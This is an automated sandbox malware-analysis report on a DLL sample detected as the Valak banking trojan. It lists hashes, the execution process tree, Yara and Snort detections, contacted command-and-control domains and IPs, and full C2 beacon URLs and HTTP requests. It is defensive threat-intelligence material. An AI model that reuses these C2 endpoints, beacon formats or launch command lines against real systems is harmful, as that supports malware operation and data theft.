Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Windows Analysis Report
draw.dll

Overview

General Information

Sample Name:draw.dll
Analysis ID:756451
MD5:78e05075e686397097de69fb0402263e
SHA1:f3e9e7f321deb1a3408053168a6a67c6cd70e114
SHA256:3769a84dbe7ba74ad7b0b355a864483d3562888a67806082ff094a56ce73bf7e
Tags:bankerdlltrojan
Infos:

Detection

Valak
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Valak
Snort IDS alert for network traffic
Machine Learning detection for sample
Uses 32bit PE files
Yara signature match
PE file contains an invalid checksum
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5220 cmdline: loaddll32.exe "C:\Users\user\Desktop\draw.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4020 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\draw.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6128 cmdline: rundll32.exe "C:\Users\user\Desktop\draw.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • wscript.exe (PID: 3680 cmdline: wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan MD5: 7075DD7B9BE8807FCA93ACD86F724884)
    • rundll32.exe (PID: 2016 cmdline: rundll32.exe C:\Users\user\Desktop\draw.dll,Productword9 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • wscript.exe (PID: 4252 cmdline: wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan MD5: 7075DD7B9BE8807FCA93ACD86F724884)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\iVIwVADQD.eLxanJoeSecurity_Allatori_ValakYara detected ValakJoe Security
    C:\Users\Public\iVIwVADQD.eLxanINDICATOR_SUSPICIOUS_JS_WMI_ExecQueryDetects JS potentially executing WMI queriesditekSHen
    • 0x1512:$ex: .ExecQuery(
    • 0x4318:$ex: .ExecQuery(
    • 0x143d:$s1: GetObject(
    • 0x4243:$s1: GetObject(
    • 0x990:$s2: String.fromCharCode(
    • 0x3796:$s2: String.fromCharCode(
    • 0x2825:$s3: ActiveXObject(
    • 0x29f1:$s3: ActiveXObject(
    • 0x562b:$s3: ActiveXObject(
    • 0x57f7:$s3: ActiveXObject(
    • 0x24fa:$s4: .Sleep(
    • 0x5300:$s4: .Sleep(

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Allatori_ValakYara detected ValakJoe Security
      0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Allatori_ValakYara detected ValakJoe Security
        00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Allatori_ValakYara detected ValakJoe Security
          0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Allatori_ValakYara detected ValakJoe Security
            0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Allatori_ValakYara detected ValakJoe Security
              Click to see the 26 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              4.3.rundll32.exe.334a950.0.unpackJoeSecurity_Allatori_ValakYara detected ValakJoe Security
                4.3.rundll32.exe.334a950.0.unpackINDICATOR_SUSPICIOUS_JS_WMI_ExecQueryDetects JS potentially executing WMI queriesditekSHen
                • 0x10ae1:$ex: .ExecQuery(
                • 0x109fd:$s1: GetObject(
                • 0xffa7:$s2: String.fromCharCode(
                • 0x11e77:$s3: ActiveXObject(
                • 0x1205e:$s3: ActiveXObject(
                • 0x11b47:$s4: .Sleep(
                0.3.loaddll32.exe.b0a950.0.raw.unpackJoeSecurity_Allatori_ValakYara detected ValakJoe Security
                  0.3.loaddll32.exe.b0a950.0.raw.unpackINDICATOR_SUSPICIOUS_JS_WMI_ExecQueryDetects JS potentially executing WMI queriesditekSHen
                  • 0x11ce1:$ex: .ExecQuery(
                  • 0x11bfd:$s1: GetObject(
                  • 0x111a7:$s2: String.fromCharCode(
                  • 0x13077:$s3: ActiveXObject(
                  • 0x1325e:$s3: ActiveXObject(
                  • 0x12d47:$s4: .Sleep(
                  4.3.rundll32.exe.334a950.0.raw.unpackJoeSecurity_Allatori_ValakYara detected ValakJoe Security
                    Click to see the 7 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:192.168.2.3152.199.19.16149702802842995 11/30/22-08:57:37.118787
                    SID:2842995
                    Source Port:49702
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3152.199.19.16149703802842995 11/30/22-08:58:20.522210
                    SID:2842995
                    Source Port:49703
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3207.148.248.14349706802842995 11/30/22-08:59:03.257622
                    SID:2842995
                    Source Port:49706
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3152.199.19.16149704802842995 11/30/22-08:58:20.803397
                    SID:2842995
                    Source Port:49704
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3207.148.248.14349705802842995 11/30/22-08:59:02.895059
                    SID:2842995
                    Source Port:49705
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3152.199.19.16149701802842995 11/30/22-08:57:37.104764
                    SID:2842995
                    Source Port:49701
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    • AV Detection
                    • Compliance
                    • Networking
                    • System Summary
                    • Data Obfuscation
                    • Hooking and other Techniques for Hiding and Protection
                    • Malware Analysis System Evasion
                    • Anti Debugging
                    • HIPS / PFW / Operating System Protection Evasion
                    • Language, Device and Operating System Detection
                    • Stealing of Sensitive Information
                    • Remote Access Functionality

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: draw.dllAvira: detected
                    Source: draw.dllReversingLabs: Detection: 82%
                    Source: draw.dllVirustotal: Detection: 75%Perma Link
                    Source: http://a-zcorner.com/Avira URL Cloud: Label: malware
                    Source: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3Avira URL Cloud: Label: malware
                    Source: http://d0d0f3d189430.comAvira URL Cloud: Label: malware
                    Source: http://knockoutlights.comAvira URL Cloud: Label: malware
                    Source: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3Avira URL Cloud: Label: malware
                    Source: http://a-zcorner.comAvira URL Cloud: Label: malware
                    Source: http://d0d0abee1d18255e.comAvira URL Cloud: Label: malware
                    Source: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDVU1SSVYrMTcwUjExNzxgZ2p1Yzw0MGM1YDU1NDxrZ2I0Pzw1NDwyNT81&client=tarbneghyrdfwglztdpcknpjvzxbxtm&service_id=FE05211&ubwG=payxcvavvogxAvira URL Cloud: Label: malware
                    Source: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1PkAvira URL Cloud: Label: malware
                    Source: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9EWyY8Oj1fPDw6MU9OWEBfRAvira URL Cloud: Label: malware
                    Source: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3U1S0pcRFtAXyI4PjlbODg%2BNUtKXERAvira URL Cloud: Label: malware
                    Source: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bAvira URL Cloud: Label: malware
                    Source: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDAvira URL Cloud: Label: malware
                    Source: knockoutlights.comVirustotal: Detection: 13%Perma Link
                    Source: a-zcorner.comVirustotal: Detection: 8%Perma Link
                    Source: organicgreensfl.comVirustotal: Detection: 5%Perma Link
                    Source: draw.dllJoe Sandbox ML: detected
                    Source: draw.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                    Source: Binary string: kbdusm.pdb source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\Month\ago\written\Weight\Root\vowel\FatOrder.pdb source: draw.dll
                    Source: Binary string: Wkbdusm.pdb source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp

                    Networking

                    barindex
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: ec.atdmt.com
                    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 207.148.248.143 80
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: a-zcorner.com
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: msnbot-207-46-194-33.search.msn.com
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: knockoutlights.com
                    Source: TrafficSnort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49701 -> 152.199.19.161:80
                    Source: TrafficSnort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49702 -> 152.199.19.161:80
                    Source: TrafficSnort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49703 -> 152.199.19.161:80
                    Source: TrafficSnort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49704 -> 152.199.19.161:80
                    Source: TrafficSnort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49705 -> 207.148.248.143:80
                    Source: TrafficSnort IDS: 2842995 ETPRO TROJAN Win32/Valak v33 CnC Activity M1 192.168.2.3:49706 -> 207.148.248.143:80
                    Source: global trafficHTTP traffic detected: GET /rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1PkBBV09QS1QpMzUyUDMzNT5iZWh3YT42MmE3Yjc3Nj5pZWA2PT43Nj4wNz03&client=ixxppezciktqtwhxserbxnujcbfpqcn&service_id=FE04120&ubwG=tzuqeqskfsnk HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: knockoutlights.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDVU1SSVYrMTcwUjExNzxgZ2p1Yzw0MGM1YDU1NDxrZ2I0Pzw1NDwyNT81&client=tarbneghyrdfwglztdpcknpjvzxbxtm&service_id=FE05211&ubwG=payxcvavvogx HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: knockoutlights.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
                    Source: Joe Sandbox ViewIP Address: 207.148.248.143 207.148.248.143
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 07:59:02 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.8Content-Length: 206Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 70 63 2e 61 73 70 78 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rpc.aspx was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 07:59:03 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.8Content-Length: 206Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 70 63 2e 61 73 70 78 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rpc.aspx was not found on this server.</p></body></html>
                    Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drString found in binary or memory: http://a-zcorner.com
                    Source: wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a-zcorner.com/
                    Source: wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3
                    Source: wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9EWyY8Oj1fPDw6MU9OWEBfR
                    Source: wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3
                    Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3U1S0pcRFtAXyI4PjlbODg%2BNUtKXER
                    Source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drString found in binary or memory: http://az361816.vo.msecnd.net
                    Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://az361816.vo.msecnd.net/rpc.aspx?winrm=2387&view2=classic&regcl
                    Source: wscript.exe, 0000000C.00000003.617880772.0000000000849000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://az361816.vo.msecnd.net/rpc.aspx?winrm=2387&view2=classic&regclid=YGl6bHIyTE1bQ1xHWCU%2FOT5cPz
                    Source: wscript.exe, 00000010.00000003.614982319.00000000007B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://az361816.vo.msecnd.net/rpc.aspx?winrm=2387&view2=classic&regclid=YWh7bXMzTUxaQl1GWSQ%2BOD9dPj
                    Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://az361816.vo.msecnd.netS
                    Source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drString found in binary or memory: http://d0d0abee1d18255e.com
                    Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d0d0abee1d18255e.comXN
                    Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drString found in binary or memory: http://d0d0f3d189430.com
                    Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drString found in binary or memory: http://ec.atdmt.com
                    Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ec.atdmt.com/
                    Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ec.atdmt.com/194-33.search.msn.com/
                    Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ec.atdmt.com/W
                    Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=YGl6bHI
                    Source: wscript.exe, 0000000C.00000003.753900638.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769313214.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=YGl6bHIyTE1bQ1xHWCU%2FOT5cPz85MkxNW0Nc
                    Source: wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=ZG1%2Ba
                    Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=ZG1%2BaHY2SElfR1hDXCE7PTpYOzs9NkhJX0dY
                    Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drString found in binary or memory: http://knockoutlights.com
                    Source: wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=b
                    Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1Pk
                    Source: wscript.exe, 0000000C.00000002.769378758.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJD
                    Source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769445270.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drString found in binary or memory: http://msnbot-207-46-194-33.search.msn.com
                    Source: wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msnbot-207-46-194-33.search.msn.com/
                    Source: wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msnbot-207-46-194-33.search.msn.com/G
                    Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=
